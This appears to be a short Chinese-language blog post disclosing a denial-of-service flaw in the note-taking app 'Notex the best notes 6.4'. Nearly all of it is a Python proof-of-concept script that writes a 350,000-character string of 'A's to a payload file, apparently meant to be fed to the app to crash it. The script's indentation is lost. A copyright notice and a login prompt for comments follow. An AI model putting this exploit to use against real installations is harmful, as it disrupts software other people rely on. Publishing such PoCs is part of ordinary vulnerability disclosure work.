# Notex the best notes 6.4 拒絕服務漏洞
==POC==
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容